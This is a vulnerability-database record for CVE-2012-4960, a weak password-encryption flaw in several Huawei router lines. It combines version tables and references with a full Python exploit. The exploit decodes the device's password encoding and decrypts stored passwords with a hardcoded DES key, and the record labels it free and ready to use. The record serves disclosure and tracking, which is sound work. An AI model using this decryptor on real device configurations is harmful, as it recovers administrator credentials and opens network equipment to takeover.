ID
VAR-E-201211-0111
CVE
| cve_id: | CVE-2012-4960 | Trust: 1.9 |
EDB ID
38020
TITLE
Huawei (Multiple Products) - Password Encryption - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
Huawei (Multiple Products) - Password Encryption. CVE-2012-4960CVE-87968 . remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | huawei | model: | - | scope: | - | version: | - | Trust: 1.0 |
| vendor: | huawei | model: | quidway series | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | huawei | model: | me60 v600r002c07 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | cx600 v600r003c00spc900 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | cx600 v600r001 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | ar r2207 | scope: | eq | version: | 19/29/49 | Trust: 0.3 |
| vendor: | huawei | model: | me60 v600r005c00spc900 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | cx600 v600r005c00spc900 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | cx600 v600r003c00spca00 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | ar r2209 | scope: | ne | version: | 19/29/49 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/56510/info
Multiple Huawei products are prone to a weak password encryption weakness.
Successful exploits may allow an attacker to decrypt stored passwords; this may aid in further attacks.
The following are vulnerable:
Huawei Quidway series
Huawei CX600 V600R001
Huawei CX600 V600R003C00SPC900
Huawei ME60 V600R002C07 and prior versions
AR 19/29/49 R2207 and prior versions
from Crypto.Cipher import DES
def decode_char(c):
if c == 'a':
r = '?'
else:
r = c
return ord(r) - ord('!')
def ascii_to_binary(s):
assert len(s) == 24
out = [0]*18
i = 0
j = 0
for i in range(0, len(s), 4):
y = decode_char(s[i + 0])
y = (y << 6) & 0xffffff
k = decode_char(s[i + 1])
y = (y | k) & 0xffffff
y = (y << 6) & 0xffffff
k = decode_char(s[i + 2])
y = (y | k) & 0xffffff
y = (y << 6) & 0xffffff
k = decode_char(s[i + 3])
y = (y | k) & 0xffffff
out[j+2] = chr(y & 0xff)
out[j+1] = chr((y>>8) & 0xff)
out[j+0] = chr((y>>16) & 0xff)
j += 3
return "".join(out)
def decrypt_password(p):
r = ascii_to_binary(p)
r = r[:16]
d = DES.new("\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB)
r = d.decrypt(r)
return r.rstrip("\x00")
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Password Encryption
Trust: 1.0
CREDITS
Roberto Paleari
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 38020 | Trust: 1.9 |
| db: | NVD | id: | CVE-2012-4960 | Trust: 1.9 |
| db: | BID | id: | 56510 | Trust: 1.9 |
| db: | EDBNET | id: | 59167 | Trust: 0.6 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2012-4960 | Trust: 1.6 |
| url: | https://www.securityfocus.com/bid/56510/info | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/38020/ | Trust: 0.6 |
| url: | http://www.huawei.com/ | Trust: 0.3 |
| url: | https://www.exploit-db.com/exploits/38020 | Trust: 0.3 |
| url: | http://support.huawei.com/enterprise/readlatestnewsaction.action?contentid=news1000001141 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 56510 |
| db: | EXPLOIT-DB | id: | 38020 |
| db: | EDBNET | id: | 59167 |
LAST UPDATE DATE
2022-07-27T09:45:18.873000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 56510 | date: | 2015-03-19T08:28:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 56510 | date: | 2012-11-13T00:00:00 |
| db: | EXPLOIT-DB | id: | 38020 | date: | 2012-11-13T00:00:00 |
| db: | EDBNET | id: | 59167 | date: | 2012-11-13T00:00:00 |